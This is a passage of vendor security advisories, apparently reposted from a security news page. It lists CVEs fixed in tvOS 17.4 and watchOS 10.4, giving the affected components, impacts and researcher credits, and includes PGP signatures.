Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved checks.  
CVE-2024-23278: an anonymous researcher

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code out of its sandbox  
or with certain elevated privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-0258: ali yabuz

MediaRemote  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious application may be able to access private  
information  
Description: The issue was addressed with improved checks.  
CVE-2024-23297: scj643

Metal  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

RTKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive user information  
Description: A race condition was addressed with improved state  
handling.  
CVE-2024-23239: Mickey Jin (@patch1t)

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23290: Wojciech Regula of SecuRing (wojciechregula.blog)

Siri  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed through improved state management.  
CVE-2024-23293: Bistrit Dahal

Spotlight  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive user information  
Description: This issue was addressed through improved state management.  
CVE-2024-23241

UIKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An injection issue was addressed with improved validation.  
WebKit Bugzilla: 266703  
CVE-2024-23280: an anonymous researcher

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

CoreAnimation  
We would like to acknowledge Junsung Lee for their assistance.

CoreMotion  
We would like to acknowledge Eric Dorphy of Twin Cities App Dev LLC for  
their assistance.

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) for their  
assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

libxpc  
We would like to acknowledge Rasmus Sten, F-Secure (Mastodon:  
@pajp@blog.dll.nu), and an anonymous researcher for their assistance.

Photos  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Sandbox  
We would like to acknowledge Zhongquan Li (@Guluisacat) for their  
assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Software Update  
We would like to acknowledge Bin Zhang of Dublin City University for  
their assistance.

WebKit  
We would like to acknowledge Nan Wang (@eternalsakura13) of 360  
Vulnerability Research Institute, Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqcgcACgkQX+5d1TXa  
IvrIdQ/9HRpg5/rTwCLemvmrsOZ3yt/cvAd9UD9uy9BFVL3yQfAStC1GBdCIZlc7  
5DUtJVCGMDb77PDK64P74Z2METMrvy5jeSCkAlCHv1FYe4F4LC8j01Dj9CEms6uI  
QAfvzSMrbVaBlXJte/x1IeI+zXwtZS4XgvpYH3kjoZbeGspxOM5z3vKRvuk0WNC9  
7FHJ43HFecsHF6mBe7Nr/8iwMxtsNwWKknaT4wywXE8hEde1OaSVya370H38SS+n  
GuSG2ivIDN8hGVvL8pCqqVqzAtNq5BzVSQ4aQ1+4MDB8QWLP/FGnjYi83qS6hDO0  
AE5TGvMOKfxqKwg4eh4ohtSvsHzXrEVG5yQgvVpz4yd4JxRizSGBloDhyDLlXL+l  
1PnuFaPFx+b6EkvafIdzo4b1O2Y6CnDy0iFrXdU3pbWG/QImxL6Krg6NtXcHGFWD  
h7iNnhJ14elhKEwTuoI0c9QlRTwRyCKSdrM8AEravz8VaoHGXJlb1SPtLUAejwH4  
kOoAT+zAb4EOELUWtgSk4d+tQeBKhD6sgOPkn6olGi5X0HJTHxiMqFCMbfNDk8Ko  
gTuMdmCOLYRbTSqoaJWW2gv9hLYoYBul9tKRgrQT6WdfKbH5WiCvZ9v7z1N4Ur8+  
l7syGGcrIX/eC2lZWGfaw49fLobn8PGvaM6cxazDhEYl9BRGlpc=  
=AI8u  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-6

Apple Security Advisory 03-07-2024-5 - watchOS 10.4 addresses buffer overflow, bypass, and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-5 watchOS 10.4

watchOS 10.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214088.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Watch Series 4 and later  
Impact: A malicious app may be able to observe user data in log entries  
related to accessibility notifications  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23291

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to elevate privileges  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23288: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Kirin (@Pwnrin)

CoreBluetooth - LE  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access Bluetooth-connected microphones  
without user permission  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2024-23250: Guilherme Rambo of Best Buddy Apps (rambo.codes)

file  
Available for: Apple Watch Series 4 and later  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: This issue was addressed with improved checks.  
CVE-2022-48554

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved checks.  
CVE-2024-23278: an anonymous researcher

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code out of its sandbox  
or with certain elevated privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-0258: ali yabuz

MediaRemote  
Available for: Apple Watch Series 4 and later  
Impact: A malicious application may be able to access private  
information  
Description: The issue was addressed with improved checks.  
CVE-2024-23297: scj643

Messages  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-23287: Kirin (@Pwnrin)

RTKit  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to leak sensitive user information  
Description: A race condition was addressed with improved state  
handling.  
CVE-2024-23239: Mickey Jin (@patch1t)

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23290: Wojciech Regula of SecuRing (wojciechregula.blog)

Share Sheet  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23231: Kirin (@Pwnrin) and luckyu (@uuulucky)

Siri  
Available for: Apple Watch Series 4 and later  
Impact: A person with physical access to a device may be able to use  
Siri to access private calendar information  
Description: A lock screen issue was addressed with improved state  
management.  
CVE-2024-23289: Lewis Hardy

Siri  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed through improved state management.  
CVE-2024-23293: Bistrit Dahal

UIKit  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An injection issue was addressed with improved validation.  
WebKit Bugzilla: 266703  
CVE-2024-23280: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

CoreAnimation  
We would like to acknowledge Junsung Lee for their assistance.

CoreMotion  
We would like to acknowledge Eric Dorphy of Twin Cities App Dev LLC for  
their assistance.

Find My  
We would like to acknowledge Meng Zhang (鲸落) of NorthSea for their  
assistance.

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) for their  
assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, and Ned Williamson of Google  
Project Zero for their assistance.

libxpc  
We would like to acknowledge Rasmus Sten, F-Secure (Mastodon:  
@pajp@blog.dll.nu), and an anonymous researcher for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Sandbox  
We would like to acknowledge Zhongquan Li (@Guluisacat) for their  
assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Software Update  
We would like to acknowledge Bin Zhang of Dublin City University for  
their assistance.

WebKit  
We would like to acknowledge Nan Wang (@eternalsakura13) of 360  
Vulnerability Research Institute, Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqceUACgkQX+5d1TXa  
IvonOhAAwwl6+Y0b68Rv2candfehqbFS9AF1RoPqGJyBZ+BcPszyPktyhxfBV7jQ  
HRiR/GCFn+m8wFtARsEQ7dqe2me/qW7Gmq7jre5A4oasMNJzSWJ/5y1hcKkbnT2A  
tWYzbqtDTmxwcPgOPEZxmOZr85TRcWcyHqOMFFKXM5iwq6bChItd0q4YqpDKIJqJ  
VvrmxWZ8xEhAqxuWUMDomGEldQB+omlZDdE+Vy6cr+vJRUt9J06GQghZG5lVTQI3  
Bv0wuNhmm0cw9rKOhUeqCwWjjzKqUodz70RgK3ihvlq3348BTNaKVL7rj/Xjla32  
Ov5VUqgPl7TZ+cndITT2XTLD7PV5Jcb5emyQiMlVmUS+gLs0EDcwdelycsZ9BWIy  
lMIqapJojAtaUiMSxgjYiILpNvBpgtgwh7kVNzPh5B740H5GuEF5WTtSDWupJ+/R  
voTF1VIBeG/Q3W63Sg39D909Gw+xoiqtw+EF4E44xrzAnNb6mefbUpNKu9533WcD  
wpJzg0lj0cTHwEvOHMqARVoFGNf8a8awPHzwugiZVuigW7eKjm+iXkhKJRxovi5r  
A2UlktISxWrcJ4jD3BS/MLOtD62IKIH4yWr7TR9Lku3JE7X4TZHzqzcOzPaTTCl7  
NGW88NsCC7F1k2kJltcEXBP4WhkMJNcZzBjJRoahScWUOxNd0FE=  
=6g/T  
-----END PGP SIGNATURE-----

Tag

#apple